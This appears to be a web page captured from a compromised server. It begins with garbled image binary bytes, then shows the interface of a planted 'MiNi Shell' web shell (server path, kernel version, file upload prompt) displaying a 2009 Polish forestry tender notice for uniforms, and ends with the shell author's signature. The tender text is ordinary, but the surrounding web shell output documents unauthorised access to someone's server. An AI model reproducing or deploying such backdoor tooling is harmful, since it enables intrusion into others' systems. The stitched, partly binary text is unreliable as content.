JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090105/636-N-2009.html

<p class="kh_header"><b>Grodzisk Wielkopolski: DOSTAWA  SORTÓW  MUNDUROWYCH  LEŚNIKA  DLA  PRACOWNIKÓW  NADLEŚNICTWA  GRODZISK  W  2009  ROKU  ( DRUGI  PRZETARG )</b><br>
<b>Numer ogłoszenia: 636 - 2009; data zamieszczenia: 05.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe, Nadleśnictwo Grodzisk z siedzibą w Lasówkach , 62-065 Grodzisk Wielkopolski, woj. wielkopolskie, tel. 061 4445301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://grodzisk.lasypanstwowe.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: LASY  PAŃSTWOWE.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA  SORTÓW  MUNDUROWYCH  LEŚNIKA  DLA  PRACOWNIKÓW  NADLEŚNICTWA  GRODZISK  W  2009  ROKU  ( DRUGI  PRZETARG ).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA  SORTÓW  MUNDUROWYCH  LEŚNIKA  DLA  PRACOWNIKÓW  NADLEŚNICTWA  GRODZISK  W  2009  ROKU ( DRUGI  PRZETARG ):
Pakiet nr I  : Dostawa sortów mundurowych leśnika (typowych). 
Pakiet nr II : Dostawa sortów mundurowych dla osób o nietypowych rozmiarach.

Pierwsze postępowanie zostało unieważnione przez Zamawiającego w dniu 23.12.2008 r. na podstawie:
- Art. 93 ust. 1 pkt. 4 ustawy Pzp: Zamawiający unieważnia postępowanie o udzielenie zamówienia, jeżeli cena najkorzystniejszej oferty przewyższa kwotę, którą Zamawiający może przeznaczyć na sfinansowanie zamówienia - Pakiet nr I.
- Art. 93 ust. 1 pkt. 1 Prawa zamówień publicznych :Zamawiający unieważnia postępowanie o udzielenie zamówienia, jeżeli nie złożono żadnej oferty niepodlegającej odrzuceniu- Pakiet nr II..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 18.10.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)  O zamówienie mogą ubiegać się wykonawcy, którzy:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
 b)   posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  
       technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
           pisemne zobowiązanie innych podmiotów do udostępnienia potencjału                 
           technicznego i osób zdolnych do wykonania zamówienia.
       -  Wymagane jest wykazanie i udokumentowanie wykonania w okresie ostatnich 
          3 lat (w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie )  
          dostaw odpowiadających swoim rodzajem i wartością dostawom stanowiącym 
          przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i 
          odbiorców,  potwierdzone referencjami, opiniami, listami polecającymi.                                                                                  Zamawiający uzna, że warunek zostanie spełniony jeśli wykonawca wykaże, że 
          wykonał 2 dostawy w wymienionym zakresie o wartości co najmniej 60 000,00 zł 
          brutto każda.
   c)   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie    
           zamówienia:
       - Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie 
         prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż                                                                    
         100 000,00 zł;
     d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
       Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia  
      - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach 
      wyszczególnionych w pkt. 9 SIWZ. Z treści załączonych dokumentów 
      musi wynikać jednoznacznie, iż ww warunki wykonawca spełnił. 
Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów  wymienionych w pkt. 9 SIWZ, lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.
2) Z ubiegania się o zamówienie publiczne wyklucza się Wykonawców, którzy:
2.1 Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 
Prawa zamówień publicznych opisanych w pkt. 1a,b,c,d SIWZ.
2.2 Podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3 Wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
2.4 Złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5 Nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
2.6 Nie zgodzili się na przedłużenie okresu związania ofertą.
3)  Zamawiający odrzuca ofertę jeżeli:
3.1 Jest niezgodna z ustawą.
3.2  Jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia., z zastrzeżeniem art. 87 ust.2 pkt.3 Ustawy Prawo zamówień publicznych.
3.3 Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji.
3.4 Zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.  
3.5 Została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert.
3.6 Zawiera błędy w obliczeniu ceny.                                                                                                    
3.7 Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt.3. Ustawy Prawo zamówień publicznych.
3.8 Jest nieważna na podstawie odrębnych przepisów.
Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
4)   Wykonawca ma prawo złożyć tylko jedną ofertę na obie części zamówienia lub tylko na jedną część zamówienia  (tylko na jeden pakiet).                                                                        
5)   Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum). 
      W takim przypadku ich oferta musi spełniać następujące wymagania:
a)	wykonawcy przedłożą wraz z ofertą pełnomocnictwo wszystkich stron, (wymaga się solidarnej odpowiedzialności wykonawców).
b)	wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy (wymagany jest oryginał pełnomocnictwa).
c) w odniesieniu do wymagań postawionych przez zamawiającego, każdy z przedsiębiorców wchodzący w  skład konsorcjum oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 pkt. 1-10 ustawy Prawo zamówień publicznych,
d) wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie musi wynikać z treści    
pełnomocnictwa. Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania. 
e)  wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na wykonawcę, w miejscu np. nazwa i adres wykonawcy należy wpisać dane dotyczące konsorcjum, a nie pełnomocnika konsorcjum.
Uwaga: wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem (liderem). 
 f)  zamawiający przed podpisaniem umowy ma prawo żądać umowy konsorcjum
     (do wglądu).  
6)  Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem 
      oferty, z zastrzeżeniem art. 93 ust. 4 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)  Oferta musi zawierać następujące dokumenty i oświadczenia:
a)   wypełniony formularz ofertowy wg załączonego druku - zał. nr 1 do SIWZ,
b)  formularz cenowy  oferty wg załączonego wzoru - zał. nr 2 do SIWZ,
c)  pełnomocnictwo podmiotów występujących wspólnie (konsorcjum),                                                                 
d)  aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji         
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  
lub zgłoszenia do ewidencji działalności gospodarczej, (wystawiony nie                                                               
wcześniej niż 6 miesięcy przed upły?wem terminu składania ofert),
e) dokumenty potwierdzające posiadanie uprawnień-pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych, 
f) oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 ustawy (na formularzu ofertowym zał. nr 1 do SIWZ);

g) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert);

h) aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zale?ga z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert);       

     i)  Wymagane jest wykazanie i udokumentowanie wykonania w okresie ostatnich 
          3 lat (w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie )  
          dostaw odpowiadających swoim rodzajem i wartością dostawom stanowiącym 
          przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i 
          odbiorców,  potwierdzone referencjami, opiniami, listami polecającymi, wg 
          załączonego wzoru - zał. nr 4 do SIWZ.
      j)  polisa, a w przypadku jej braku inny dokumentu potwierdzającego, że wykonawca 
           jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
          działalności. Wykonawca musi dołączyć do oferty ubezpieczenie od 
          odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na 
          sumę ubezpieczenia nie mniejszą niż 100 000,00 zł (w przypadku konsorcjum łączna   
          wartość polis OC członków konsorcjum o wartości minimum 100 000,00 zł).
     k)  w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom 
         określonym przez zamawiającego wykonawca zobowiązany jest przedłożyć w  
         stosunku do wszystkich sortów mundurowych Świadectwo oceny zgodności  
         ze wzorem munduru leśnika.
2)  Dokumenty mogą być przedstawione w formie oryginału lub kopii 
     poświadczonych za zgodność z oryginałem przez upełnomocnionego 
     przedstawiciela wykonawcy. Kopia potwierdzana za zgodność z oryginałem musi być  
     poświadczona na każdej stronie zawierającej treść.
                                                                     3)  Brak jakiegokolwiek z wyżej wymienionych dokumentów, lub złożenie  
     dokumentu w niewłaściwej formie (np. niepoświadczone przez wykonawcę za  
     zgodność z oryginałem odpisy lub kopie) spowoduje wykluczenie wykonawcy 
     z postępowania.
4)  Zamawiający informuje, że zgodnie z art. 96 ust. 3 ustawy Prawo zamówień 
     publicznych oferty składane w postępowaniu o zamówienie publiczne są jawne  
     i podlegają udostępnieniu od chwili ich otwarcia, z wyjątkiem informacji 
     stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu 
     nieuczciwej konkurencji, jeśli wykonawca, nie później niż w terminie składania 
     ofert, zastrzegł, że nie mogą one być udostępniane.                                                      
5)  Przez tajemnicę przedsiębiorstwa w rozumieniu art. 11 ust. 4 ustawy z dnia 16 
      kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. Nr 47 z dnia 8 
      czerwca 1993 r., poz. 211, z późn. zm.) rozumie się nieujawnione do wiadomości 
      publicznej informacje techniczne, technologiczne, organizacyjne przedsiębiorstwa lub 
      inne informacje posiadające wartość gospodarczą, co, do których przedsiębiorca 
      podjął niezbędne działania w celu zachowania ich poufności, tzn. zastrzegł składając 
      ofertę, iż nie mogą być one udostępnione innym uczestnikom postępowania.
6)  Stosowne zastrzeżenie wykonawca winien złożyć na formularzu ofertowym. 
      W przeciwnym razie cała oferta zostanie ujawniona na życzenie każdej 
      zainteresowanej osoby.                                                           
7)   Zamawiający zaleca, aby informacje zastrzeżone jako tajemnica przedsiębiorstwa 
      były przez wykonawcę złożone w oddzielnej wewnętrznej kopercie z oznakowaniem  
      tajemnica przedsiębiorstwa, lub spięte (zszyte) oddzielnie od pozostałych, jawnych 
      elementów oferty.
                                                                 
Uwaga:
- Zastrzeżenie informacji, które nie stanowią tajemnicy przedsiębiorstwa w rozumieniu w/w ustawy skutkować będzie odrzuceniem oferty na podstawie art. 89 ust. 1 pkt 1  ustawy Prawo zamówień publicznych.
- Wykonawca w szczególności nie może zastrzec informacji dotyczących ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofercie (art. 86 ust. 4 ustawy).
8)  Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej.
     Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium   
     Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa      
     dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę 
     lub miejsce zamieszkania, potwierdzające odpowiednio, że:
     1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
     2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
     3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne     
     lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub                                                         
rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://grodzisk.lasypanstwowe.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać nieodpłatnie w siedzibie Nadleśnictwa Grodzisk w Lasówkach (sekretariat) w godz. 7.00-15.00 od poniedziałku do piątku do dnia 14.01.2009 r. do godz. 15.00..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2009 godzina 08:00, miejsce: Sekretariat Nadleśnictwa Grodzisk (Lasówki)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 01 <b>NAZWA:</b> Pakiet nr I  : Dostawa sortów mundurowych leśnika (typowych).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr I  : Dostawa sortów mundurowych leśnika (typowych)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 18.10.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 02 <b>NAZWA:</b> Pakiet nr II : Dostawa sortów mundurowych dla osób o nietypowych rozmiarach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr II : Dostawa sortów mundurowych dla osób o nietypowych rozmiarach.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 18.10.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com